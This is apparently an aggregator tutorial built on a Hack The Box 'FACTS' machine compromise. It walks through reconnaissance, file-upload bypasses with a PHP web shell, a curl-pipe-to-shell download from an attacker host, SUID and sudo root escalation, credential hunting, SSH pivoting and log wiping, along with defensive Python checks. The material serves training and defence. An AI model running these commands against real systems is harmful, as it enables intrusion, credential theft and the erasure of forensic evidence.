Introduction:
Penetration testing platforms like Hack The Box have become the modern-day proving ground for cybersecurity professionals, simulating real-world attacks in controlled environments. Successfully compromising a machine, such as the “FACTS” box in HTB’s Season 10, requires a blend of systematic reconnaissance, vulnerability exploitation, and post-compromise privilege escalation. This article deconstructs the underlying methodologies and technical commands that lead to such a “pwn,” transforming a celebratory post into an actionable learning blueprint for red teams and blue teams alike.
Learning Objectives:
- Understand the core methodology for approaching an unknown HTB/Linux machine.
- Learn practical commands for reconnaissance, exploitation, and privilege escalation on Linux systems.
- Identify common misconfigurations and vulnerabilities that lead to full system compromise.
You Should Know:
1. The Reconnaissance Phase: Mapping the Attack Surface
Every successful penetration test begins with thorough enumeration. Before attacking, you must discover what you’re facing.
Network Scanning: Use `nmap` to discover open ports and services.
```bash
# Aggressive scan for top 1000 ports with service detection (-O needs root: run via sudo if you are not already root)
nmap -sV -sC -O -T4 <TARGET_IP>
# Full TCP port scan (slower but thorough)
nmap -p- -T4 <TARGET_IP>
# UDP scan for critical services (DNS, SNMP)
sudo nmap -sU --top-ports 100 <TARGET_IP>
```
Web Application Enumeration: If HTTP/HTTPS ports are open, enumerate directories, subdomains, and technologies.
```bash
# Directory brute-forcing with Gobuster
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt
# Technology fingerprinting with WhatWeb
whatweb http://<TARGET_IP>
```
2. Initial Foothold: Exploiting the First Vulnerability
The initial breach often comes from a vulnerable service or web application.
Analyzing Service Versions: Cross-reference discovered service versions (from nmap -sV) with databases like Exploit-DB or Searchsploit.
```bash
# Search for exploits locally using Searchsploit
searchsploit "Apache 2.4.49"
# Examine a specific exploit by its EDB-ID
searchsploit -x 12345
```
Web Exploitation – File Upload Bypass: A common vector. If you find an upload function, test for bypasses.
```php
<!-- Sample malicious PHP shell for upload -->
<?php system($_GET['cmd']); ?>
```
Try extensions: .php5, .phtml, .phar, or double extensions: shell.php.jpg.
Use Burp Suite to intercept and modify the `Content-Type` header to image/jpeg.
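From the defender's side, every bypass listed above works because the server trusts the client. The following is an added example (hypothetical handler logic in Python, standing in for whatever server-side code the upload form calls; not code from the box or the original post) that shows the weak check those tricks defeat next to a hardened one that ignores `Content-Type`, allowlists a single extension, checks file magic, and renames the file.

```python
"""Server-side upload validation: the weak check the bypasses above defeat, beside a
hardened one. Added, hypothetical handler logic; not code from the box or the post."""
import os
import secrets
from pathlib import PurePosixPath
from typing import Optional

# The weak check only denylists one extension, so .phtml/.php5 and shell.php.jpg pass.
BLOCKED_EXT = {".php"}

# Hardened allowlist: extension -> accepted leading bytes (file magic).
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def weak_is_allowed(filename: str, content_type: str) -> bool:
    """Trusts the client-supplied Content-Type (trivially set to image/jpeg in Burp)
    and looks only at the last extension. Every trick in the text above gets through."""
    ext = PurePosixPath(filename).suffix.lower()
    return content_type.startswith("image/") and ext not in BLOCKED_EXT


def hardened_check(filename: str, data: bytes) -> Optional[str]:
    """Returns a server-chosen storage name, or None when the upload is rejected.
    The client's Content-Type is never consulted: the bytes and an allowlist decide."""
    suffixes = [s.lower() for s in PurePosixPath(os.path.basename(filename)).suffixes]
    # Exactly one extension, and it must be on the allowlist: this rejects
    # shell.phtml (not allowlisted) and shell.php.jpg (two extensions) alike.
    if len(suffixes) != 1 or suffixes[0] not in ALLOWED:
        return None
    ext = suffixes[0]
    # Magic-byte check stops a bare PHP file renamed to .jpg. It does not stop a
    # real JPEG with PHP appended, so the upload directory must also be served
    # with script execution disabled.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return None
    # Never keep the client's name: a random name defeats path and name tricks and
    # keeps the stored extension under server control.
    return secrets.token_hex(16) + ext
```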
3. Establishing a Stable Shell: Upgrading Your Access
A basic web shell is unstable. Upgrade to a fully interactive TTY shell.
On the victim machine, after gaining command execution:
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
Background the shell with Ctrl+Z, then on your attacker machine:
```bash
stty raw -echo; fg
```
Then reset the terminal and export environment variables:
```bash
reset
export TERM=xterm
export SHELL=bash
# Match rows/columns to the output of `stty size` on your own terminal
stty rows 38 columns 116
```
4. Post-Exploitation Enumeration: Hunting for Privilege Escalation Vectors
The key to going from user to root lies in meticulous internal enumeration.
Manual Linux Enumeration:
```bash
# Check sudo permissions
sudo -l
# Look for SUID/SGID binaries
find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -g=s 2>/dev/null
# Check for world-writable files or directories
find / -type f -perm -o=w 2>/dev/null
# Look for cron jobs (system cron lives in /etc/crontab and /etc/cron.*)
crontab -l
ls -la /etc/cron*
# Check for readable sensitive files
cat /etc/passwd
cat /etc/shadow 2>/dev/null
```
Automated Enumeration Scripts: Use tools like LinPEAS for a comprehensive sweep.
```bash
# Transfer LinPEAS to the victim machine and run it
curl -L http://<ATTACKER_IP>/linpeas.sh | sh
```
5. Privilege Escalation: Exploiting Misconfigurations
A common vector is exploiting a SUID binary or a writable service running as root.
SUID Binary Exploit (e.g., find): If `find` has the SUID bit set, you can escalate.
```bash
# Using find to spawn a root shell
find / -exec /bin/sh \; -quit
```
Exploiting Sudo Rights (e.g., vi/vim): If a user can run `vi` as root via sudo.
```bash
sudo vim -c ':!/bin/sh'
```
Kernel Exploitation: As a last resort, if a kernel vulnerability exists.
```bash
# Identify kernel version
uname -a
# Search for an appropriate exploit, compile, and run
gcc exploit.c -o exploit
chmod +x exploit
./exploit
```
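The enumeration in section 4 and the misconfigurations in section 5 are exactly what a host owner should be auditing for before an attacker does. The following is an added example (not code from the post; the shell-capable binary list and the SUID baseline are illustrative and must be adjusted to your own build) that flags unexpected SUID/SGID bits and world-writable cron files from `st_mode` values, so it can be run against the live filesystem or against a recorded file inventory.

```python
"""Defender-side audit for the misconfigurations hunted for above: unexpected SUID/SGID
binaries and world-writable files in cron or /etc. Added example; lists are illustrative."""
import os
import stat
from typing import Iterable, List, Tuple

# Binaries the text names (find, vim) plus shells and interpreters: with a SUID bit
# any of these hands out a root shell. Extend from what your hosts actually ship.
SHELL_CAPABLE = {"find", "vim", "vi", "bash", "sh", "python3", "perl"}
# Files that legitimately carry SUID on a typical distro (hypothetical baseline).
EXPECTED_SUID = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount", "/usr/bin/umount"}
CRON_PREFIXES = ("/etc/cron", "/var/spool/cron")
Finding = Tuple[str, str, str]  # (severity, path, reason)

def classify(path: str, mode: int) -> List[Finding]:
    """Judge one regular file from its st_mode. Directories and links are skipped."""
    out: List[Finding] = []
    if not stat.S_ISREG(mode):
        return out
    name = os.path.basename(path)
    if mode & (stat.S_ISUID | stat.S_ISGID) and path not in EXPECTED_SUID:
        bit = "SUID" if mode & stat.S_ISUID else "SGID"
        sev = "HIGH" if name in SHELL_CAPABLE else "MEDIUM"
        out.append((sev, path, f"unexpected {bit} bit on {name}"))
    if mode & stat.S_IWOTH:
        if path.startswith(CRON_PREFIXES):
            out.append(("HIGH", path, "world-writable cron file: anyone can edit the job"))
        elif path.startswith("/etc/"):
            out.append(("MEDIUM", path, "world-writable file under /etc"))
    return out

def audit(entries: Iterable[Tuple[str, int]]) -> List[Finding]:
    """Run classify over (path, st_mode) pairs from any source, sorted by severity."""
    findings: List[Finding] = []
    for path, mode in entries:
        findings.extend(classify(path, mode))
    return sorted(findings)

def walk_host(root: str = "/") -> List[Finding]:
    """Feed the live filesystem to audit(); lstat so symlinks are not followed."""
    def entries():
        for dirpath, _, files in os.walk(root):
            for f in files:
                p = os.path.join(dirpath, f)
                try:
                    yield p, os.lstat(p).st_mode
                except OSError:
                    continue
    return audit(entries())
```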
6. Lateral Movement & Pivoting (If Applicable in the Network)
In more complex environments, you may need to move from one compromised host to another.
Dumping Credentials: Search for passwords in config files, history, or memory.
```bash
# Search for files containing the word "password"
grep -ri "password" /home /opt /var/www 2>/dev/null
# Check bash history
cat ~/.bash_history
```
SSH Pivoting: Use SSH to create a tunnel to access an internal network.
```bash
# Create a dynamic SOCKS proxy via the compromised host
ssh -D 1080 user@<COMPROMISED_IP> -f -N
# Then configure proxychains to route tools through this tunnel
```
7. Covering Tracks & Forensic Awareness (For CTFs & Ethical Practice)
Understanding how attacks are logged is crucial for both attackers and defenders.
Clearing Logs (Demonstrative):
```bash
# Clear current user's history
history -c
# Overwrite and delete the history file
shred -zu ~/.bash_history
# Truncate wtmp (requires root): this empties the whole login record, not a single user's entry, and leaves lastlog untouched
echo "" > /var/log/wtmp
```
Note: In real engagements, this is done only within strict rules of engagement. In CTFs like HTB, it’s often unnecessary.
What Undercode Say:
- Methodology Over Tools: The specific tool matters less than the underlying process: Recon, Foothold, Enumeration, Escalation. Mastering this cycle is more valuable than memorizing a thousand exploits.
- Context is King: Automated scripts like LinPEAS are invaluable, but they generate noise. The real skill lies in manually interpreting findings—understanding why a writable cron job or a specific SUID binary is a critical vulnerability in that particular system’s context.
Analysis: Jean Hurtado’s post, adorned with certifications like eJPTv2 and ISO 27001, underscores a vital trend: the cybersecurity industry increasingly values demonstrable, hands-on skill alongside formal knowledge frameworks. Platforms like Hack The Box bridge the gap between theory and the chaotic reality of offensive security. The “FACTS” machine compromise isn’t just a badge; it’s a microcosm of a real-world attack chain, from external enumeration to root dominance. It highlights that persistent threats often stem not from zero-days, but from unpatched services, misconfigurations, and weak credential hygiene—all issues that robust internal enumeration can uncover.
Prediction:
The future of penetration testing and threat simulation will be deeply intertwined with AI and automation. We will see AI-assisted reconnaissance that dynamically prioritizes attack vectors, and automated penetration testing platforms that can continuously probe for new vulnerabilities as systems update. However, the human element—the creative thinking required to chain together unconventional vulnerabilities, as often needed in HTB—will remain irreplaceable. The rise of these platforms will consequently push the industry towards a “continuous penetration testing” model, integrating red team tactics directly into DevOps (DevSecOps) pipelines, making security an ongoing, dynamic process rather than a periodic audit.
Reported By: Jean Hurtado – Hackers Feeds